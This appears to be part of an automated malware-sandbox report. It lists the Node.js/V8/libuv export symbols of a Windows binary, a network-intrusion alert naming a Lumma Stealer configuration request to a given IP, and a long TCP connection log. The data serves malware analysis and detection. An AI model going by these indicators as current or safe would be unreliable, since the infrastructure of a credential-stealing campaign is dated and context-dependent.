                                                                                                                                                    ?Value@Int32@v8@@QEBAHXZ6250x140173290
                                                                                                                                                    ?Value@Integer@v8@@QEBA_JXZ6260x1401731b0
                                                                                                                                                    ?Value@Number@v8@@QEBANXZ6270x140173020
                                                                                                                                                    ?Value@Uint32@v8@@QEBAIXZ6280x140173370
                                                                                                                                                    ?VerifyExternalStringResource@String@v8@@AEBAXPEAVExternalStringResource@12@@Z6290x140172dd0
                                                                                                                                                    ?VerifyExternalStringResourceBase@String@v8@@AEBAXPEAVExternalStringResourceBase@12@W4Encoding@12@@Z6300x140172e70
                                                                                                                                                    ?VisitExternalResources@V8@v8@@SAXPEAVExternalResourceVisitor@2@@Z6310x140173bf0
                                                                                                                                                    ?VisitExternalString@ExternalResourceVisitor@v8@@UEAAXV?$Handle@VString@v8@@@2@@Z6320x140368010
                                                                                                                                                    ?VisitHandlesWithClassIds@V8@v8@@SAXPEAVPersistentHandleVisitor@2@@Z6330x140173cc0
                                                                                                                                                    ?VisitPersistentHandle@PersistentHandleVisitor@v8@@UEAAXV?$Persistent@VValue@v8@@@2@G@Z6340x140368010
                                                                                                                                                    ?WeakCallback@ObjectWrap@node@@CAXV?$Persistent@VValue@v8@@@v8@@PEAX@Z6350x140001c30
                                                                                                                                                    ?WinapiErrnoException@node@@YA?AV?$Local@VValue@v8@@@v8@@HPEBD00@Z6360x14000aae0
                                                                                                                                                    ?Wrap@External@v8@@SA?AV?$Local@VValue@v8@@@2@PEAX@Z6370x140175340
                                                                                                                                                    ?Wrap@ObjectWrap@node@@IEAAXV?$Handle@VObject@v8@@@v8@@@Z6380x140001a60
                                                                                                                                                    ?WrapperClassId@?$Persistent@VFunctionTemplate@v8@@@v8@@QEBAGXZ6390x140002d10
                                                                                                                                                    ?WrapperClassId@?$Persistent@VObject@v8@@@v8@@QEBAGXZ6400x140002d10
                                                                                                                                                    ?Write@String@v8@@QEBAHPEAGHHH@Z6410x140172a60
                                                                                                                                                    ?WriteAscii@String@v8@@QEBAHPEADHHH@Z6420x140172780
                                                                                                                                                    ?WriteDoubleBE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z6430x140014960
                                                                                                                                                    ?WriteDoubleLE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z6440x140014940
                                                                                                                                                    ?WriteFloatBE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z6450x140014920
                                                                                                                                                    ?WriteFloatLE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z6460x140014900
                                                                                                                                                    ?WriteHeapStatsChunk@OutputStream@v8@@UEAA?AW4WriteResult@12@PEAUHeapStatsUpdate@2@H@Z6470x140374d60
                                                                                                                                                    ?WriteUtf8@String@v8@@QEBAHPEADHPEAHH@Z6480x140172180
                                                                                                                                                    ?active_@Locker@v8@@0_NA6490x1405ed31a
                                                                                                                                                    ?auto_enable@Extension@v8@@QEAA_NXZ6500x1400012d0
                                                                                                                                                    ?constructor_template@Buffer@node@@2V?$Persistent@VFunctionTemplate@v8@@@v8@@A6510x1405efc48
                                                                                                                                                    ?data@ExternalAsciiStringResourceImpl@v8@@UEBAPEBDXZ6520x140001400
                                                                                                                                                    ?dependencies@Extension@v8@@QEAAPEAPEBDXZ6530x14021f030
                                                                                                                                                    ?dependency_count@Extension@v8@@QEAAHXZ6540x1400012b0
                                                                                                                                                    ?heap_size_limit@HeapStatistics@v8@@QEAA_KXZ6550x140001410
                                                                                                                                                    ?kLineOffsetNotFound@Function@v8@@2HB6560x14042be50
                                                                                                                                                    ?kMaxLength@Buffer@node@@2IB6570x1403dc8d4
                                                                                                                                                    ?kNoColumnInfo@Message@v8@@2HB6580x1403db9bc
                                                                                                                                                    ?kNoLineNumberInfo@CpuProfileNode@v8@@2HB6590x1403db9bc
                                                                                                                                                    ?kNoLineNumberInfo@Message@v8@@2HB6600x1403db9bc
                                                                                                                                                    ?kPersistentHandleNoClassId@HeapProfiler@v8@@2GB6610x140552d88
                                                                                                                                                    ?kUnknownObjectId@HeapProfiler@v8@@2IB6620x1403db9bc
                                                                                                                                                    ?length@AsciiValue@String@v8@@QEBAHXZ6630x140187520
                                                                                                                                                    ?length@ExternalAsciiStringResourceImpl@v8@@UEBA_KXZ6640x1402900a0
                                                                                                                                                    ?length@Utf8Value@String@v8@@QEBAHXZ6650x140187520
                                                                                                                                                    ?length@Value@String@v8@@QEBAHXZ6660x140187520
                                                                                                                                                    ?match@TypeSwitch@v8@@QEAAHV?$Handle@VValue@v8@@@2@@Z6670x140161220
                                                                                                                                                    ?max_executable_size@ResourceConstraints@v8@@QEAAHXZ6680x140187520
                                                                                                                                                    ?max_old_space_size@ResourceConstraints@v8@@QEBAHXZ6690x1400013e0
                                                                                                                                                    ?max_young_space_size@ResourceConstraints@v8@@QEBAHXZ6700x14009b9e0
                                                                                                                                                    ?name@Extension@v8@@QEBAPEBDXZ6710x140001400
                                                                                                                                                    ?no_deprecation@node@@3_NA6720x1405ecff3
                                                                                                                                                    ?set_auto_enable@Extension@v8@@QEAAX_N@Z6730x1400012c0
                                                                                                                                                    ?set_heap_size_limit@HeapStatistics@v8@@AEAAX_K@Z6740x140001440
                                                                                                                                                    ?set_max_executable_size@ResourceConstraints@v8@@QEAAXH@Z6750x140265580
                                                                                                                                                    ?set_max_old_space_size@ResourceConstraints@v8@@QEAAXH@Z6760x1400013f0
                                                                                                                                                    ?set_max_young_space_size@ResourceConstraints@v8@@QEAAXH@Z6770x1400013d0
                                                                                                                                                    ?set_stack_limit@ResourceConstraints@v8@@QEAAXPEAI@Z6780x140001430
                                                                                                                                                    ?set_total_heap_size@HeapStatistics@v8@@AEAAX_K@Z6790x140001420
                                                                                                                                                    ?set_total_heap_size_executable@HeapStatistics@v8@@AEAAX_K@Z6800x1400019a0
                                                                                                                                                    ?set_used_heap_size@HeapStatistics@v8@@AEAAX_K@Z6810x140001430
                                                                                                                                                    ?source@Extension@v8@@QEBAPEBVExternalAsciiStringResource@String@2@XZ6820x1400012a0
                                                                                                                                                    ?source_length@Extension@v8@@QEBA_KXZ6830x1402900a0
                                                                                                                                                    ?stack_limit@ResourceConstraints@v8@@QEBAPEAIXZ6840x1402900a0
                                                                                                                                                    ?total_heap_size@HeapStatistics@v8@@QEAA_KXZ6850x140002bf0
                                                                                                                                                    ?total_heap_size_executable@HeapStatistics@v8@@QEAA_KXZ6860x140001400
                                                                                                                                                    ?used_heap_size@HeapStatistics@v8@@QEAA_KXZ6870x1402900a0
                                                                                                                                                    node_buffer_module6880x1405e8a78
                                                                                                                                                    node_cares_wrap_module6890x1405e8b50
                                                                                                                                                    node_crypto_module6900x1405e7408
                                                                                                                                                    node_evals_module6910x1405e89d8
                                                                                                                                                    node_fs_event_wrap_module6920x1405e8b78
                                                                                                                                                    node_fs_module6930x1405e8a50
                                                                                                                                                    node_http_parser_module6940x1405e8a28
                                                                                                                                                    node_os_module6950x1405e8a00
                                                                                                                                                    node_pipe_wrap_module6960x1405e8988
                                                                                                                                                    node_process_wrap_module6970x1405e83c8
                                                                                                                                                    node_signal_wrap_module6980x1405e8960
                                                                                                                                                    node_tcp_wrap_module6990x1405e8938
                                                                                                                                                    node_timer_wrap_module7000x1405e8910
                                                                                                                                                    node_tty_wrap_module7010x1405e88e8
                                                                                                                                                    node_udp_wrap_module7020x1405e7478
                                                                                                                                                    node_zlib_module7030x1405e89b0
                                                                                                                                                    uv_accept7040x140151f70
                                                                                                                                                    uv_async_init7050x14014b5e0
                                                                                                                                                    uv_async_send7060x14014b680
                                                                                                                                                    uv_backend_fd7070x1402a6540
                                                                                                                                                    uv_backend_timeout7080x14028a7c0
                                                                                                                                                    uv_barrier_destroy7090x14015b5c0
                                                                                                                                                    uv_barrier_init7100x14015b520
                                                                                                                                                    uv_barrier_wait7110x14015b600
                                                                                                                                                    uv_buf_init7120x140141290
                                                                                                                                                    uv_cancel7130x1402a6540
                                                                                                                                                    uv_chdir7140x140146060
                                                                                                                                                    uv_check_init7150x140147530
                                                                                                                                                    uv_check_start7160x140147560
                                                                                                                                                    uv_check_stop7170x140147640
                                                                                                                                                    uv_close7180x140142fd0
                                                                                                                                                    uv_cond_broadcast7190x14015b310
                                                                                                                                                    uv_cond_destroy7200x14015b250
                                                                                                                                                    uv_cond_init7210x14015b200
                                                                                                                                                    uv_cond_signal7220x14015b2a0
                                                                                                                                                    uv_cond_timedwait7230x14015b4a0
                                                                                                                                                    uv_cond_wait7240x14015b460
                                                                                                                                                    uv_cpu_info7250x140146a90
                                                                                                                                                    uv_cwd7260x140145f40
                                                                                                                                                    uv_default_loop7270x140140c40
                                                                                                                                                    uv_disable_stdio_inheritance7280x14014cf10
                                                                                                                                                    uv_dlclose7290x140147990
                                                                                                                                                    uv_dlerror7300x140147a10
                                                                                                                                                    uv_dlopen7310x1401478f0
                                                                                                                                                    uv_dlsym7320x1401479d0
                                                                                                                                                    uv_err_name7330x1401412a0
                                                                                                                                                    uv_exepath7340x140145e50
                                                                                                                                                    uv_free_cpu_info7350x140146f10
                                                                                                                                                    uv_free_interface_addresses7360x140147340
                                                                                                                                                    uv_freeaddrinfo7370x140145b50
                                                                                                                                                    uv_fs_chmod7380x1401512a0
                                                                                                                                                    uv_fs_chown7390x140150800
                                                                                                                                                    uv_fs_close7400x14014fc40
                                                                                                                                                    uv_fs_event_init7410x1401425c0
                                                                                                                                                    uv_fs_fchmod7420x1401513f0
                                                                                                                                                    uv_fs_fchown7430x140150910
                                                                                                                                                    uv_fs_fdatasync7440x140150f70
                                                                                                                                                    uv_fs_fstat7450x140150c50
                                                                                                                                                    uv_fs_fsync7460x140150e70
                                                                                                                                                    uv_fs_ftruncate7470x140151070
                                                                                                                                                    uv_fs_futime7480x140151630
                                                                                                                                                    uv_fs_link7490x140150480
                                                                                                                                                    uv_fs_lstat7500x140150b20
                                                                                                                                                    uv_fs_mkdir7510x1401500b0
                                                                                                                                                    uv_fs_open7520x14014fb10
                                                                                                                                                    uv_fs_poll_init7530x140151840
                                                                                                                                                    uv_fs_poll_start7540x140151870
                                                                                                                                                    uv_fs_poll_stop7550x140151a10
                                                                                                                                                    uv_fs_read7560x14014fd40
                                                                                                                                                    uv_fs_readdir7570x140150350
                                                                                                                                                    uv_fs_readlink7580x1401506d0
                                                                                                                                                    uv_fs_rename7590x140150d50
                                                                                                                                                    uv_fs_req_cleanup7600x1401517e0
                                                                                                                                                    uv_fs_rmdir7610x140150200
                                                                                                                                                    uv_fs_sendfile7620x140151180
                                                                                                                                                    uv_fs_stat7630x1401509f0
                                                                                                                                                    uv_fs_symlink7640x1401505a0
                                                                                                                                                    uv_fs_unlink7650x14014ff80
                                                                                                                                                    uv_fs_utime7660x140151500
                                                                                                                                                    uv_fs_write7670x14014fe60
                                                                                                                                                    uv_get_free_memory7680x140146240
                                                                                                                                                    uv_get_process_title7690x140146620
                                                                                                                                                    uv_get_total_memory7700x140146290
                                                                                                                                                    uv_getaddrinfo7710x140145b70
                                                                                                                                                    uv_guess_handle7720x140142f20
                                                                                                                                                    uv_handle_size7730x140141100
                                                                                                                                                    uv_hrtime7740x140146700
                                                                                                                                                    uv_idle_init7750x140147710
                                                                                                                                                    uv_idle_start7760x140147740
                                                                                                                                                    uv_idle_stop7770x140147820
                                                                                                                                                    uv_inet_ntop7780x140144f90
                                                                                                                                                    uv_inet_pton7790x140145350
                                                                                                                                                    uv_interface_addresses7800x140146f60
                                                                                                                                                    uv_ip4_addr7810x140141a40
                                                                                                                                                    uv_ip4_name7820x140141ae0
                                                                                                                                                    uv_ip6_addr7830x140141a90
                                                                                                                                                    uv_ip6_name7840x140141b00
                                                                                                                                                    uv_is_active7850x140142fb0
                                                                                                                                                    uv_is_closing7860x140143280
                                                                                                                                                    uv_is_readable7870x140152440
                                                                                                                                                    uv_is_writable7880x140152450
                                                                                                                                                    uv_kill7890x14014ce70
                                                                                                                                                    uv_last_error7900x140001400
                                                                                                                                                    uv_listen7910x140151f20
                                                                                                                                                    uv_loadavg7920x140146230
                                                                                                                                                    uv_loop_configure7930x140142220
                                                                                                                                                    uv_loop_delete7940x140140cd0
                                                                                                                                                    uv_loop_new7950x140140c70
                                                                                                                                                    uv_mutex_destroy7960x14015ae40
                                                                                                                                                    uv_mutex_init7970x14015ae20
                                                                                                                                                    uv_mutex_lock7980x14015ae50
                                                                                                                                                    uv_mutex_trylock7990x14015ae60
                                                                                                                                                    uv_mutex_unlock8000x14015ae80
                                                                                                                                                    uv_now8010x140142210
                                                                                                                                                    uv_once8020x14015adc0
                                                                                                                                                    uv_pipe_bind8030x140152e60
                                                                                                                                                    uv_pipe_connect8040x140153240
                                                                                                                                                    uv_pipe_init8050x1401524e0
                                                                                                                                                    uv_pipe_open8060x140155790
                                                                                                                                                    uv_pipe_pending_instances8070x140152e50
                                                                                                                                                    uv_poll_init8080x140144080
                                                                                                                                                    uv_poll_init_socket8090x1401440b0
                                                                                                                                                    uv_poll_start8100x140144260
                                                                                                                                                    uv_poll_stop8110x1401442c0
                                                                                                                                                    uv_prepare_init8120x140147350
                                                                                                                                                    uv_prepare_start8130x140147380
                                                                                                                                                    uv_prepare_stop8140x140147460
                                                                                                                                                    uv_process_kill8150x14014cdf0
                                                                                                                                                    uv_queue_work8160x140151e50
                                                                                                                                                    uv_read2_start8170x140152060
                                                                                                                                                    uv_read_start8180x140151fc0
                                                                                                                                                    uv_read_stop8190x1401520f0
                                                                                                                                                    uv_ref8200x1401421c0
                                                                                                                                                    uv_req_size8210x1401411b0
                                                                                                                                                    uv_resident_set_memory8220x140146780
                                                                                                                                                    uv_run8230x140140f00
                                                                                                                                                    uv_rwlock_destroy8240x14015aef0
                                                                                                                                                    uv_rwlock_init8250x14015ae90
                                                                                                                                                    uv_rwlock_rdlock8260x14015af20
                                                                                                                                                    uv_rwlock_rdunlock8270x14015afe0
                                                                                                                                                    uv_rwlock_tryrdlock8280x14015af70
                                                                                                                                                    uv_rwlock_trywrlock8290x14015b050
                                                                                                                                                    uv_rwlock_wrlock8300x14015b030
                                                                                                                                                    uv_rwlock_wrunlock8310x14015b090
                                                                                                                                                    uv_sem_destroy8320x14015b0e0
                                                                                                                                                    uv_sem_init8330x14015b0b0
                                                                                                                                                    uv_sem_post8340x14015b100
                                                                                                                                                    uv_sem_trywait8350x14015b150
                                                                                                                                                    uv_sem_wait8360x14015b130
                                                                                                                                                    uv_set_process_title8370x140146390
                                                                                                                                                    uv_setup_args8380x140295cd0
                                                                                                                                                    uv_shutdown8390x140152320
                                                                                                                                                    uv_signal_init8400x140156300
                                                                                                                                                    uv_signal_start8410x140156400
                                                                                                                                                    uv_signal_stop8420x140156350
                                                                                                                                                    uv_spawn8430x14014c770
                                                                                                                                                    uv_stop8440x140142200
                                                                                                                                                    uv_strerror8450x140141700
                                                                                                                                                    uv_strlcat8460x140141240
                                                                                                                                                    uv_strlcpy8470x140141210
                                                                                                                                                    uv_tcp_bind8480x140141b20
                                                                                                                                                    uv_tcp_bind68490x140141b70
                                                                                                                                                    uv_tcp_connect8500x140141db0
                                                                                                                                                    uv_tcp_connect68510x140141e00
                                                                                                                                                    uv_tcp_getpeername8520x1401581f0
                                                                                                                                                    uv_tcp_getsockname8530x140158160
                                                                                                                                                    uv_tcp_init8540x140156a20
                                                                                                                                                    uv_tcp_keepalive8550x140159100
                                                                                                                                                    uv_tcp_nodelay8560x140159060
                                                                                                                                                    uv_tcp_open8570x140159550
                                                                                                                                                    uv_tcp_simultaneous_accepts8580x140159240
                                                                                                                                                    uv_thread_create8590x1401420c0
                                                                                                                                                    uv_thread_join8600x14015ade0
                                                                                                                                                    uv_thread_self8610x140142150
                                                                                                                                                    uv_timer_again8620x140144c30
                                                                                                                                                    uv_timer_get_repeat8630x140144d90
                                                                                                                                                    uv_timer_init8640x140144a80
                                                                                                                                                    uv_timer_set_repeat8650x140144d40
                                                                                                                                                    uv_timer_start8660x140144ac0
                                                                                                                                                    uv_timer_stop8670x140144bc0
                                                                                                                                                    uv_tty_get_winsize8680x140147e00
                                                                                                                                                    uv_tty_init8690x140147b20
                                                                                                                                                    uv_tty_reset_mode8700x140368010
                                                                                                                                                    uv_tty_set_mode8710x140147ce0
                                                                                                                                                    uv_udp_bind8720x140141be0
                                                                                                                                                    uv_udp_bind68730x140141c30
                                                                                                                                                    uv_udp_getsockname8740x140159630
                                                                                                                                                    uv_udp_init8750x140159880
                                                                                                                                                    uv_udp_open8760x14015a8e0
                                                                                                                                                    uv_udp_recv_start8770x140141fd0
                                                                                                                                                    uv_udp_recv_stop8780x140142000
                                                                                                                                                    uv_udp_send8790x140141e60
                                                                                                                                                    uv_udp_send68800x140141f50
                                                                                                                                                    uv_udp_set_broadcast8810x14015a810
                                                                                                                                                    uv_udp_set_membership8820x14015a6a0
                                                                                                                                                    uv_udp_set_multicast_loop8830x14015abe0
                                                                                                                                                    uv_udp_set_multicast_ttl8840x14015aac0
                                                                                                                                                    uv_udp_set_ttl8850x14015a9a0
                                                                                                                                                    uv_unref8860x1401421e0
                                                                                                                                                    uv_update_time8870x1401443a0
                                                                                                                                                    uv_uptime8880x140146810
                                                                                                                                                    uv_version8890x140147b00
                                                                                                                                                    uv_version_string8900x140147b10
                                                                                                                                                    uv_walk8910x140142160
                                                                                                                                                    uv_write8920x140152160
                                                                                                                                                    uv_write28930x140152260
                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    EnglishUnited States
                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                    192.168.2.4172.67.195.22949738802046637 09/05/23-13:02:23.880969TCP2046637ET TROJAN [ANY.RUN] Win32/Lumma Stealer Configuration Request Attempt4973880192.168.2.4172.67.195.229
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Sep 5, 2023 13:01:19.715096951 CEST49717443192.168.2.4104.18.6.142
                                                                                                                                                    Sep 5, 2023 13:01:19.715147972 CEST44349717104.18.6.142192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:19.715249062 CEST49717443192.168.2.4104.18.6.142
                                                                                                                                                    Sep 5, 2023 13:01:19.757509947 CEST49717443192.168.2.4104.18.6.142
                                                                                                                                                    Sep 5, 2023 13:01:19.757533073 CEST44349717104.18.6.142192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.051014900 CEST44349717104.18.6.142192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.051143885 CEST49717443192.168.2.4104.18.6.142
                                                                                                                                                    Sep 5, 2023 13:01:20.125375986 CEST49717443192.168.2.4104.18.6.142
                                                                                                                                                    Sep 5, 2023 13:01:20.125420094 CEST44349717104.18.6.142192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.126379013 CEST44349717104.18.6.142192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.179172039 CEST49717443192.168.2.4104.18.6.142
                                                                                                                                                    Sep 5, 2023 13:01:20.452742100 CEST49717443192.168.2.4104.18.6.142
                                                                                                                                                    Sep 5, 2023 13:01:20.495522022 CEST44349717104.18.6.142192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.778733015 CEST44349717104.18.6.142192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.778847933 CEST44349717104.18.6.142192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.778980017 CEST49717443192.168.2.4104.18.6.142
                                                                                                                                                    Sep 5, 2023 13:01:20.789666891 CEST49717443192.168.2.4104.18.6.142
                                                                                                                                                    Sep 5, 2023 13:01:20.789773941 CEST44349717104.18.6.142192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.789781094 CEST49717443192.168.2.4104.18.6.142
                                                                                                                                                    Sep 5, 2023 13:01:20.789802074 CEST44349717104.18.6.142192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.948575974 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:20.948628902 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:20.948767900 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:20.949826002 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:20.949851036 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.236452103 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.236735106 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.242722988 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.242748976 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.243153095 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.245182037 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.287494898 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.649578094 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.649679899 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.649724007 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.649770021 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.649790049 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.649805069 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.649864912 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.649876118 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.649943113 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.649952888 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.649964094 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.650021076 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.650028944 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.650105953 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.650156975 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.650166035 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.650831938 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.650878906 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.650923967 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.650933981 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.650945902 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.651005030 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.651015043 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.651067019 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.651721001 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.651797056 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.651832104 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.651869059 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.651880980 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.651957035 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.652658939 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.652736902 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.652780056 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.652816057 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.652834892 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.652844906 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.652930975 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.653563023 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.653636932 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.653672934 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.653709888 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.653721094 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.653768063 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.654469013 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.654514074 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.654541969 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.654557943 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.654572010 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.654649973 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.677318096 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.677402020 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.677534103 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.677548885 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.677606106 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.677705050 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.677763939 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.677817106 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.677828074 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.678289890 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.678330898 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.678373098 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.678384066 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.678448915 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.679270983 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.679371119 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.778358936 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.778436899 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.778574944 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.778593063 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.778631926 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.778649092 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.781791925 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.781949043 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.781991005 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.782118082 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.784172058 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.784235001 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.784274101 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.784312010 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.784326077 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.784359932 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.784394026 CEST44349718104.18.6.94192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:01:21.784446001 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.784866095 CEST49718443192.168.2.4104.18.6.94
                                                                                                                                                    Sep 5, 2023 13:01:21.784892082 CEST44349718104.18.6.94192.168.2.4
